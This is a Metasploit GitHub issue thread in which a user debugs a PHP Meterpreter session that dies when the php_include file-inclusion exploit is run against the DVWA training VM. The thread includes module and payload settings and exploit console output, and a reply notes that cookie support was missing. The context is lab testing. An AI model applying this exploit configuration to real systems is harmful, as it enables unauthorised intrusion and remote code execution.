Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with HTTPS or Subversion.

Download ZIP

Loading…

question about PHP Meterpreter #809

Closed
anakin629 opened this Issue · 2 comments

3 participants

@anakin629

I am using http://www.offensive-security.com/metasploit-unleashed/PHP_Meterpreter this module
doing the test on DVWA http://www.dvwa.co.uk/ this test VM which has a LFI test enviroment。
this is the basic config:


sf exploit(php_include) > show options

Module options (exploit/unix/webapp/php_include):

Name Current Setting Required Description


PATH / yes The base directory to prepend to the URL to try
PHPRFIDB /opt/metasploit/msf3/data/exploits/php/rfi-locations.dat no A local file containing a list of URLs to try, with XXpathXX replacing the URL
PHPURI /dvwa/vulnerabilities/fi/?page=XXpathXX no The URI to request, with the include parameter changed to XXpathXX
POSTDATA no The POST data to send, with the include parameter changed to XXpathXX
Proxies no Use a proxy chain
RHOST 192.168.245.130 yes The target address
RPORT 80 yes The target port
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host

Payload options (php/meterpreter/bind_tcp):

Name Current Setting Required Description


LPORT 80 yes The listen port
RHOST 192.168.245.130 no The target address

Exploit target:

Id Name


0 Automatic

msf exploit(php_include) >

the result is

msf exploit(php_include) > exploit

[] Started bind handler
[
] Using URL: http://0.0.0.0:8080/TUit3E6Uxxs
[] Sending stage (39217 bytes) to 192.168.245.130
[
] Local IP: http://192.168.245.128:8080/TUit3E6Uxxs
[] PHP include server started.
[
] 192.168.245.130 - Meterpreter session 3 closed. Reason: Died
[*] Meterpreter session 3 opened (127.0.0.1 -> 192.168.245.130:80) at 2012-09-20 09:58:24 +0800
[-] Failed to load extension: No response was received to the core_loadlib request.

[-] Invalid session id

msf exploit(php_include) > sessions

##I googled the error, it said some heart beat machnism, I do not understand !
can someone solve the problem ?

@ethicalhack3r

Hi,

The php_include module did not support authenticated exploitation (the use of cookies) which DVWA requires.

I amended the script earlier this afternoon to support the passing of additional headers (cookies). See the following ticket for the code and usage information:

http://dev.metasploit.com/redmine/issues/7277

Thanks,
Ryan

@todb-r7
Owner

This is being tracked handily on Redmine at http://dev.metasploit.com/redmine/issues/7277 so closing this out -- we're trying to keep the GitHub issues strictly to Pull Requests, and keep bugs and questions and stuff over on Redmine (see https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md ).

@todb-r7 todb-r7 closed this
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Something went wrong with that request. Please try again.